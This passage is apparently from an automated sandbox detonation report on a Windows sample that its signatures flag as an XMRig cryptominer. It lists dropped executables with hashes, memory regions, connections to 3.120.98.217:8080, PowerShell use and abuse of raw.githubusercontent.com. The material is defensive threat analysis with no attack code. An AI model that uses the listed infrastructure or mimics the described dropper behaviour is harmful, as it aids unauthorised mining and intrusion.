C:\Windows\System\rirqLTj.exe

C:\Windows\System\rirqLTj.exe

C:\Windows\System\HSqwfMl.exe

C:\Windows\System\HSqwfMl.exe

C:\Windows\System\gNrvwFr.exe

C:\Windows\System\gNrvwFr.exe

C:\Windows\System\HKcVoRE.exe

C:\Windows\System\HKcVoRE.exe

C:\Windows\System\zEbrzSb.exe

C:\Windows\System\zEbrzSb.exe

C:\Windows\System\yNrGetC.exe

C:\Windows\System\yNrGetC.exe

C:\Windows\System\oLpiFLX.exe

C:\Windows\System\oLpiFLX.exe

C:\Windows\System\mKTLIBC.exe

C:\Windows\System\mKTLIBC.exe

C:\Windows\System\wbqBfac.exe

C:\Windows\System\wbqBfac.exe

C:\Windows\System\islEQfC.exe

C:\Windows\System\islEQfC.exe

C:\Windows\System\vNrPoxV.exe

C:\Windows\System\vNrPoxV.exe

C:\Windows\System\KAmxJlo.exe

C:\Windows\System\KAmxJlo.exe

C:\Windows\System\mShtwAD.exe

C:\Windows\System\mShtwAD.exe

C:\Windows\System\CVxlqZj.exe

C:\Windows\System\CVxlqZj.exe

C:\Windows\System\ozlNGwG.exe

C:\Windows\System\ozlNGwG.exe

C:\Windows\System\nankTGa.exe

C:\Windows\System\nankTGa.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2104-0-0x00000000000F0000-0x0000000000100000-memory.dmp

memory/2104-1-0x000000013F940000-0x000000013FD32000-memory.dmp

C:\Windows\system\bOwsIEf.exe

MD5 337762533d0e0566df614a5f03fa1eaa
SHA1 adba15f74e307a034804dfc26cd79c0bb1948d81
SHA256 d94bd8d31ef6efa1a435902e1b49e876a03498e9efd0d5d5968b6392e76982b6
SHA512 14f57a6c9daa77be981e30facb0cfb4d95088a857c15b69cd3f464a0a4e870cf6448adbeb15d005a958f7ad11c3b162270aa9a93c3006a89743322561adde8b0

memory/3016-9-0x000000013F100000-0x000000013F4F2000-memory.dmp

memory/2104-8-0x000000013F100000-0x000000013F4F2000-memory.dmp

memory/1652-14-0x000007FEF536E000-0x000007FEF536F000-memory.dmp

\Windows\system\SHYViEx.exe

MD5 7805fa08d228ebed7551791e6918a00f
SHA1 77151b269be9a26b45cafe9d9d12a7d44e356f71
SHA256 976e240a3ec612d49e451b74dc897377b204ae45839df951fc415e10aaa7992f
SHA512 efb94e12e6c8da5755b8ac76ba62566d6893427699c18cd4c6bcaeda876b0997628b0055502821e09f8c9d57338f6f04db01a5804b527fb492637a27665f4241

C:\Windows\system\dcFSTBl.exe

MD5 aa49166d77e855951ad8f1baefa05268
SHA1 7a612a8a50c5acdef3f923ecfdc76c6c04c5cc1e
SHA256 c7a0a7a884f116d74306a0c171c1e55b74c418919dfb081f466b24fa3ac11359
SHA512 38257b2f0be8650780a970fa902401a5680d6c39f00fde303d0087900e31b16d60123dff6df8547fd47674b08d125bfaf1aeb6b6fc87a3596f35b79124724256

\Windows\system\yBwXTXG.exe

MD5 ba90f32b9c62b3b573916b5b551eade8
SHA1 97e37465f5a5109788002da724eedf6a3bb2482f
SHA256 4c39a051f760c9f06fabc4d1e4e1ccf44a45b28e5f050dc5d07e569178ea4135
SHA512 5b381597193dcfdc4b69aca3778073e2f41685c17beba7bae7207b0d25530a1db144c3d7c709fc02ade1ce3684f8e333b00c70e76b25be0d5ebb285fd0cbd533

\Windows\system\vvEAzgP.exe

MD5 14e0fc828115337e4990443af94d2714
SHA1 1c13bbfae0a3e520cf525da45816b6d3f66d5ab4
SHA256 d4d6b7ce06a604f9dcb5fb5160ebe333c2ae08a750f8d1c17c7421df41d4e381
SHA512 e1227ebdd9d2ee68cb23adeb81ee6e64bbac0d4eeca6dccacae56edf084ba92804c3c4ea93e780ebd6c1bdf5f2c7e75b919fe050986c765500626c5cdb964eeb

C:\Windows\system\cualdXX.exe

MD5 1d40227f7a175f6cb46ec16df782ca21
SHA1 696581a77e95dde0c1c8c7555387b8643ae6500f
SHA256 6ae93e9568a2d875edb54f22073b44cfc0a6c4993afb5b1318c23f05faa11894
SHA512 5dbdc10590ed43ea82d0d3e1914f4b7a46e08f62340c939fdb34d9f0a2e5e679a455b645531292908c59325c512560f410642bff821a93f38f8171bde51515f1

C:\Windows\system\auvTuOf.exe

MD5 2e376c5c996b0744577bfa993fcb6633
SHA1 fdca4a47dbbf21dd9b188cb5236b7fbe98944a05
SHA256 0f65fc4508e989c984161eef4ee364cf9b62b5fe9df88012d96256094ee2843e
SHA512 8a468636e5b1a6b38701469666e4d6659a3a863faa822bee672da2b5fb79f04ffe1cc2b71cd952b08ec7dded5c9b20f553c33cbf19bfef6530a61d44485e5f8b

memory/1652-57-0x0000000002290000-0x0000000002298000-memory.dmp

\Windows\system\QYIjkGj.exe

MD5 7328a6a512d2e92b675899b5ad64c429
SHA1 0f2eb70bd7e16e20fa441ee8def7db7042726b9d
SHA256 e080823f57dca8df638def91bb0098eaa95c1667c09ab2c4c7f0bd7ee38b9731
SHA512 bcabf69b3e64295a2a989cffe71948a69f5bc697b80f754c09377c52ae5b2991c8aa10d97ca413049b351a2c1a4cec15a283606594fb55344d552c2c5bfeb219

C:\Windows\system\tRnWOOm.exe

MD5 837bd11c8b58a8fe4e01a183fc18603d
SHA1 06563ccdf16323cb6282d26ec51c734104de560d
SHA256 3e1798b759783640dd9b471111b1468295934a08b4afa25b082d8b3d15808b8c
SHA512 567624ec6c49d5c1c8b0d0a3559d6d74447b1ea0ac8edde253043877bcf367374e5e2451c175faf3f7045ad33a4e55f67eb87d942dc56700d8d6e807de7e495a

C:\Windows\system\nCfqZyI.exe

MD5 c678c7e4dd3f020421d4cacb8ee379ff
SHA1 4ffae14fd90401d41e5330db5112fca6b6ada1e1
SHA256 56d8b8e0063cc70c6439a79a8e010f0264340ba8a08f83ab77a75cc14a09251d
SHA512 44e1b5c1f058dfb14e3c753a41c2e51eb5c02c287cbc84ee76cf95ed16c452a6c2026277cef049af8b56c838035f879c8bc424fbb3f153f37d78d2a4f8ccc224

C:\Windows\system\EZjAoTz.exe

MD5 f693c11a321845a59e0474159532ed95
SHA1 bb1a23a2aa97ceb399e10473c2dae35c0a6001cc
SHA256 6258d39158ee5c058a159441df254551133af47dbd30b7aa059db289acc1e3b8
SHA512 dde49dd6dd324b469ff41f3fc4faa13cf905e439ecf3644da098dd188aef819707425a03357ec5d2d69ec077f65eee091ea662bb89884824a73a2bbba61d7d7d

C:\Windows\system\TxjyDsq.exe

MD5 326f15e5a68593ee03528f98130656ea
SHA1 d9dc35eba695e5d93a8b05f25d0ef8a6995a6ba9
SHA256 09bbcdb017f4584d1383a2edfdffc2a76054a051818373daab1a7bed5a1c9cc2
SHA512 fd2229150298aca78ecf467bbb5c29a5c6fb4e53865fa3279048cdf16cfac5ab3c5e393d805b45a07f81072549d46e59de9d4a8a7c417fbbdf2d1a99cf7c5b25

C:\Windows\system\vanvNUE.exe

MD5 3761026e51f3e35c0e8b375ac516c12a
SHA1 3e6a87af4768c6ada4155decaca6134e3133226b
SHA256 c0bb102466fbcacef7c6e83838e01553b298f718145f2fe5241c5efc4e0931f1
SHA512 c7423c0a136256d4adff104f9b14e38255169baee40a0c3b34077a0c70a10adccec36fe6507caceda6df223f2a2db318bb0e270dbbb2015c327a79f323dcbe07

C:\Windows\system\ddwuOGU.exe

MD5 eaa320f57d2e58b4c8de8f5c0ca65816
SHA1 940d33f8893847e157389ca8a681d792e96d3c34
SHA256 f85860173e2052b0749684a0453f00178757a420c1ed0450380363e9da827c6a
SHA512 7c226557a3a502562b9d821921c0ade8e9844d90d86838e09a011c929d827ed3078852e9e646b5b719f162883f7d3d7cdda946fb02f2d9074142ef35f3e4ee42

\Windows\system\PJSqTwP.exe

MD5 002bb463e2fe9e3ca45eb9fe8c3fab1d
SHA1 e9f0caa86bd31e436411abb547a9dbb0df492e39
SHA256 d871ed81cd395e283981bab457a21ba4ded565a178c249bc2d002f2cb0e7f5d6
SHA512 dcc57deb47533fe3606bbd8f5a8fd33d2814a2491bb7c3806949bdea29f11d3b2d1df84a712859455d9a8b31c37cb0657db3eab14d88c87168faedb537a9c3fa

memory/1652-493-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

C:\Windows\system\gwvysft.exe

MD5 28d2238cffecc86fee200f39e71fb1bf
SHA1 6114b2039f8dd37bbbc254dc825df38d16d4faee
SHA256 d1763800be35d60c52d33417662019c91f0f2cbac5dfd0e00843b9131fa652de
SHA512 ed31444befc7a2765014dd8235f421204e965e69b3dc4ac77f2893375b07fbb2d5dd608ad8ecd94a2fc801c698820f397eebafa11721521ef97fead38d113397

C:\Windows\system\dLmIShV.exe

MD5 3a631e594c5d933f09253f6f8bc5cc0e
SHA1 3b499dc4dbf47396218b6d4d5127bef4e2336b57
SHA256 4de6c4fa2c238fa11f14d7cd162f1ad2d0e4a787793fc2a49d0ec62014ae7c9d
SHA512 43ae0e2dd4b3a691ebea11c53636a665879c2c4c3cfdea57093b01b94b684a4efb985a52494045c91509da6c825d6822ac7c57b1013c9bd0bb8233edccf0055e

C:\Windows\system\RaGfsME.exe

MD5 fe9b7eb38fefc5a090fdf4e5de8ee1e2
SHA1 04f079fc6cd5a67866843ad120f995f0fba946bc
SHA256 bb8b8876d4094f6a2ff7a0b367e4a39f89f62fcd4757c1586c9745969b92f778
SHA512 cbcab9007c257f98df5b645d3ada52aa21035c87f99d551e473176216da778cec783e054e5765421a89c17fdcb51816252ebf14374125f67173e56cc1ce28b27

C:\Windows\system\AovGbkG.exe

MD5 93f8463e982dce9faf738610bcaf895f
SHA1 3532b875744e18092671fa59cef87db0d53a8319
SHA256 1fdd06b895d83fead0cf44499cddd9331cd5aacede6361fefe45b37d364dc066
SHA512 d24f2385625eca9d1df8871d38b752e6e6281a22f5243b845dc75543b7584a4a702294fd1001f74fafc43479009c0c4738ad81188b08751ad2e263fa852db1d1

C:\Windows\system\gnyMEel.exe

MD5 50fb783dbb384fb707ccf855bc7c50b7
SHA1 75b96430634cbc10ce894d9cec25b386d2df444b
SHA256 b37dde5e04bb7af098ab11b0ca7ad34be3935d9b9dbb028c682bec7515dd3447
SHA512 41710cbfcf0a80903ea7dcb3b72d716b3864214d0ea2b46219ccd1cd8524e385586a71830555d9202e6767261da0ecfec115acd5a9243f9bee35874388e03c6e

C:\Windows\system\DatdwDJ.exe

MD5 b5a5ceaacdde304bdcabfbdf1bfb6fbb
SHA1 00d60e56ccdec578e9066220daf54dfcdaa5bef6
SHA256 51b747340f059b7458fcfb007932ec96874f603bdb28b48603f840be394e5864
SHA512 4e51ed284ce3c8d45f872041ab1e40cc4041f78d3422de6bd60ead7677e9783de4087e5fb8abf59df2e4379b7cbabc82f34d7bb138fec1c6ab9c40670d07178b

C:\Windows\system\QYlJInL.exe

MD5 fd57fff0908a74131a3b35359d23a9d4
SHA1 0c425e4aa82c0d4a11b3f32e5b79e4d0aa5373b0
SHA256 4cea12e40ff1c414fc7a0ea56be14f327be158ec38e61da70078e3a458f9f27c
SHA512 90ce682a68e396d841141d9921d20529222432ac6b276078fd10c7a82d2cc2f9f107fcada4bf51ee9c7f4296f43482ac02d5f6a6ad7c06e754d79d9aec933d83

C:\Windows\system\GCSuzVw.exe

MD5 71bca8cea45c4e3060e13ee6a033f5ec
SHA1 4b08c3a9659ec3d98ecf078db9689f38d4821923
SHA256 bca989c24dbfcbf35531dc4ea07e115ab37e7e986ba7d9e386ba5da2358d544e
SHA512 0b05ac98c2c4a3d2002609788b97dc60633cdc2ebb93d23b886a52f287d4b8ec2aa8da586492e55755b3d84909fa8c1b4862c35cb1223d2ae7904c6d874f0087

C:\Windows\system\WxhdyAP.exe

MD5 f5b7ba6eb1435bdb4bac1dffe0f77a4f
SHA1 6b2f96c898fb3a890617ef7f10948c3e2fd4ffef
SHA256 15f12b20ff51c41d6d453b2744b7b73fff4949acb02b7491da39464846db4942
SHA512 f213dea15355f61a693891ea19ebfc155fea07e8bbbc21f4d3d79b66d025aad00848cb03f83de007c2174fe6c5654a78fa7274831fab032f264d1174b6a5ab72

C:\Windows\system\LneGZqL.exe

MD5 7d618d33c0a11325fc778d4d2e67890d
SHA1 6048f6f9b051a1822b624f5e0cf405a8a28aaefa
SHA256 c750354aeea370c5040f2b1ca42feeb345fc68bec43939f2abd24d2c970fafd8
SHA512 f8e6e43a481f1d8b0b6eb72f3ca97b48670cad983d571ddb80dbe96d899a62e88fc59dc416ad17a5bc38dd5815f1725932d28cbd96588a3f7fceb47b075641b1

C:\Windows\system\RDlJFIB.exe

MD5 7909d4bc5642679fc100923b9f2c5e69
SHA1 0cc730ef2d181caf81591bc37f508a58713e2a79
SHA256 6314da35be0f5ecdd3a6a74b4d900b8deec446fde1b31534d941c65785918e4b
SHA512 fa9a5a49d7d5f0894fe1d73aafd5bfffbc9cae92896641760344622ce1c3ce56838f8abb9125bea76fcc27f5c3d5e793ceceae9acfde14972554cf20b485a6bb

C:\Windows\system\aTnAPCk.exe

MD5 fa02f58cef5968243f478b1f369846c1
SHA1 99a25471dac95cbd11bea8a8a294c01562310e34
SHA256 1b10f237680efecbff3ca2f753a584756118b13c1597cca832622e6cceaa875c
SHA512 2399164e18e2988442fcdc44029da9a309c405f6bf0ed5bae3de217179f4347d418e175a078d6282ea99c4ffd31eb1b1df46d3b9aeb14033c57dc0424b1323ba

memory/2620-73-0x000000013F9C0000-0x000000013FDB2000-memory.dmp

memory/2104-61-0x0000000002DA0000-0x0000000003192000-memory.dmp

memory/1652-60-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/1652-59-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2104-99-0x000000013F1C0000-0x000000013F5B2000-memory.dmp

memory/2104-98-0x0000000003170000-0x0000000003562000-memory.dmp

memory/2104-97-0x000000013F080000-0x000000013F472000-memory.dmp

memory/1652-96-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/804-95-0x000000013F080000-0x000000013F472000-memory.dmp

memory/2908-94-0x000000013F850000-0x000000013FC42000-memory.dmp

memory/2104-93-0x0000000003170000-0x0000000003562000-memory.dmp

memory/2940-92-0x000000013FE10000-0x0000000140202000-memory.dmp

memory/2104-91-0x000000013FE10000-0x0000000140202000-memory.dmp

memory/2560-90-0x000000013F030000-0x000000013F422000-memory.dmp

memory/2104-89-0x000000013F030000-0x000000013F422000-memory.dmp

memory/2484-88-0x000000013FA80000-0x000000013FE72000-memory.dmp

memory/2104-87-0x0000000003170000-0x0000000003562000-memory.dmp

memory/2660-85-0x000000013F100000-0x000000013F4F2000-memory.dmp

memory/1652-84-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2684-83-0x000000013FEF0000-0x00000001402E2000-memory.dmp

memory/2104-82-0x000000013F100000-0x000000013F4F2000-memory.dmp

memory/2104-81-0x000000013FEF0000-0x00000001402E2000-memory.dmp

memory/2336-79-0x000000013F0D0000-0x000000013F4C2000-memory.dmp

C:\Windows\system\WtpAotk.exe

MD5 729b5f3a8a3ff1efe7228e7d8a077cf9
SHA1 88883a8752b09b9ee730f260cef9cb72c3c07074
SHA256 815d6442c60c612cba48f0846ed5286ae2e4e0ada43cf7e2346f744d18820390
SHA512 f20354eb9f6af5075ebe584a1d31d0729fafb4f346c394e9ffff1fd54e3e01a35cd0b901db2acf6471d77a886965bfeaca26f507031fd1a3799af67c3ee1f86e

memory/2104-77-0x000000013F0D0000-0x000000013F4C2000-memory.dmp

C:\Windows\system\TYdzXPO.exe

MD5 ffa65bad72e3b001481dd1659b04d723
SHA1 03750d84760a5f0aa8bee3b70fc2c8459fa95c79
SHA256 df9ab9f2ba8af63070469c56e6cb0769d72d9667903d1b99771f243dcd31cc1f
SHA512 0ea86b1348dab2e69b641290ba61f462268dce65d40da1fa3a00f4e74b0654d84993d2dc64fee0b7ccfaa1770836431ee5f6de66e50649b368f13d6764fe4e09

memory/2104-69-0x0000000002DA0000-0x0000000003192000-memory.dmp

C:\Windows\system\UFirVxb.exe

MD5 cd9ba93100680307c7a64bca2d540c56
SHA1 0c039e138af3aad86557bef13060b7b2fb88f1cd
SHA256 970b311d3f136c9d1bc598455ff9aab79a2d8cc6a6d3c2407f8854883c8e8294
SHA512 17c25099744df658fdd2ab03b3b92350c35c2f4c6491e4bd793fb461f26ddf35fef3c56bf8eb4cca178be20e8fab57a7d260086cce4da9a2f6aade8d172211e7

memory/2348-64-0x000000013F5E0000-0x000000013F9D2000-memory.dmp

C:\Windows\system\vxQIyxs.exe

MD5 298b0ac71d9eeced6c3ff610cee792b7
SHA1 5e722aa9c1fa7b3d983bd23f2bd3f11f453fe2b7
SHA256 058c3394a50566ae71d93490294db47efd417601cf03e02f136dacf284ce5f21
SHA512 937e80fd4b4e201c23429af96f40a481bd2d6582ca9dde3ad2cc47764d1eeeb80a50a9292d3548553303c62b7a683284c156ea25d14d04f40cacd3806a5a484e

C:\Windows\system\FnQPgSH.exe

MD5 bb2f97d855885b567a61a6950b3df619
SHA1 3788385248ba6d7c7f810b61591a73c9cf8c1796
SHA256 d0e635695855b5637509d59fa29f628c0ee3bf68d413a2ac1e577e316d4be0c0
SHA512 f1ee90ebfbb9b32ac33c3ff41f68368e6f171345a4c758b6ca54344480c0d9f970a70558baa1dea55c5aeac9dc2e504859883219b11f1d7691ddf3b8da91731e

memory/1652-32-0x000000001B3B0000-0x000000001B692000-memory.dmp

memory/3016-2605-0x000000013F100000-0x000000013F4F2000-memory.dmp

memory/804-2770-0x000000013F080000-0x000000013F472000-memory.dmp

memory/2620-3011-0x000000013F9C0000-0x000000013FDB2000-memory.dmp

memory/2684-3373-0x000000013FEF0000-0x00000001402E2000-memory.dmp

memory/2908-3814-0x000000013F850000-0x000000013FC42000-memory.dmp

memory/2348-3922-0x000000013F5E0000-0x000000013F9D2000-memory.dmp

memory/2660-3943-0x000000013F100000-0x000000013F4F2000-memory.dmp

memory/2336-3951-0x000000013F0D0000-0x000000013F4C2000-memory.dmp

memory/2560-4064-0x000000013F030000-0x000000013F422000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 08:25

Reported

2024-06-13 08:28

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\GmWDoge.exe N/A
N/A N/A C:\Windows\System\JbEGmIe.exe N/A
N/A N/A C:\Windows\System\wEwmdoy.exe N/A
N/A N/A C:\Windows\System\tgXmEHn.exe N/A
N/A N/A C:\Windows\System\bxvgoxm.exe N/A
N/A N/A C:\Windows\System\awMoYzi.exe N/A
N/A N/A C:\Windows\System\eMEsneA.exe N/A
N/A N/A C:\Windows\System\rlchjDO.exe N/A
N/A N/A C:\Windows\System\UGzbyIK.exe N/A
N/A N/A C:\Windows\System\tUslfqn.exe N/A
N/A N/A C:\Windows\System\brNXVSb.exe N/A
N/A N/A C:\Windows\System\SJeRPcj.exe N/A
N/A N/A C:\Windows\System\WGHWgIl.exe N/A
N/A N/A C:\Windows\System\SuQJxhP.exe N/A
N/A N/A C:\Windows\System\eLOOKHu.exe N/A
N/A N/A C:\Windows\System\NaGyone.exe N/A
N/A N/A C:\Windows\System\lxESXJQ.exe N/A
N/A N/A C:\Windows\System\ZytymWx.exe N/A
N/A N/A C:\Windows\System\bcvXdmk.exe N/A
N/A N/A C:\Windows\System\aehDcHo.exe N/A
N/A N/A C:\Windows\System\QTIQIwL.exe N/A
N/A N/A C:\Windows\System\uZmeJel.exe N/A
N/A N/A C:\Windows\System\QpLmxIi.exe N/A
N/A N/A C:\Windows\System\jsuuXpQ.exe N/A
N/A N/A C:\Windows\System\DbVxONV.exe N/A
N/A N/A C:\Windows\System\ehOaJVK.exe N/A
N/A N/A C:\Windows\System\soJVmbm.exe N/A
N/A N/A C:\Windows\System\QfhBUXV.exe N/A
N/A N/A C:\Windows\System\UzWWRUE.exe N/A
N/A N/A C:\Windows\System\jlhULBp.exe N/A
N/A N/A C:\Windows\System\aFUqLUM.exe N/A
N/A N/A C:\Windows\System\MEgGaFw.exe N/A
N/A N/A C:\Windows\System\tMMHyLl.exe N/A
N/A N/A C:\Windows\System\uEcAIXl.exe N/A
N/A N/A C:\Windows\System\RZGIOmq.exe N/A
N/A N/A C:\Windows\System\jTsCvzr.exe N/A
N/A N/A C:\Windows\System\vTaoDND.exe N/A
N/A N/A C:\Windows\System\bFVKaSA.exe N/A
N/A N/A C:\Windows\System\onKToCt.exe N/A
N/A N/A C:\Windows\System\jvNrnkx.exe N/A
N/A N/A C:\Windows\System\qKleYeX.exe N/A
N/A N/A C:\Windows\System\SJjfMjl.exe N/A
N/A N/A C:\Windows\System\BQzsRrJ.exe N/A
N/A N/A C:\Windows\System\WbfDKXB.exe N/A
N/A N/A C:\Windows\System\EYxBJzp.exe N/A
N/A N/A C:\Windows\System\slTCRLd.exe N/A
N/A N/A C:\Windows\System\hqSLSTO.exe N/A
N/A N/A C:\Windows\System\vLCuOpI.exe N/A
N/A N/A C:\Windows\System\WmcQxEO.exe N/A
N/A N/A C:\Windows\System\lkvkivn.exe N/A
N/A N/A C:\Windows\System\JjZmpng.exe N/A
N/A N/A C:\Windows\System\iCJqcME.exe N/A
N/A N/A C:\Windows\System\NNaIjhk.exe N/A
N/A N/A C:\Windows\System\JOVOYWp.exe N/A
N/A N/A C:\Windows\System\aTeYxBX.exe N/A
N/A N/A C:\Windows\System\uTBtxUy.exe N/A
N/A N/A C:\Windows\System\UtFglni.exe N/A
N/A N/A C:\Windows\System\bZILROj.exe N/A
N/A N/A C:\Windows\System\DKpeyWz.exe N/A
N/A N/A C:\Windows\System\pqZpOAO.exe N/A
N/A N/A C:\Windows\System\CeXqcdH.exe N/A
N/A N/A C:\Windows\System\tQsXGkI.exe N/A
N/A N/A C:\Windows\System\SgvgDiX.exe N/A
N/A N/A C:\Windows\System\kpImApH.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\AyXCica.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FAdTFqQ.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PHNIRue.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eTRrayl.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\brNXVSb.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\clqNeTV.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qhTWBpp.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KyDbpLX.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CFNoIhE.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YnJyrPZ.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mMQSGoh.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BxXqPqd.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cixuCVi.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PqPTzte.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UqYjDRD.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fqXDpbF.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WWwromW.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kaAiLed.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wWYWuuj.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RuNbnno.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RmdNkCu.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pbVhFfi.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SgSNHns.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tEHSqHi.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oavKqLM.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
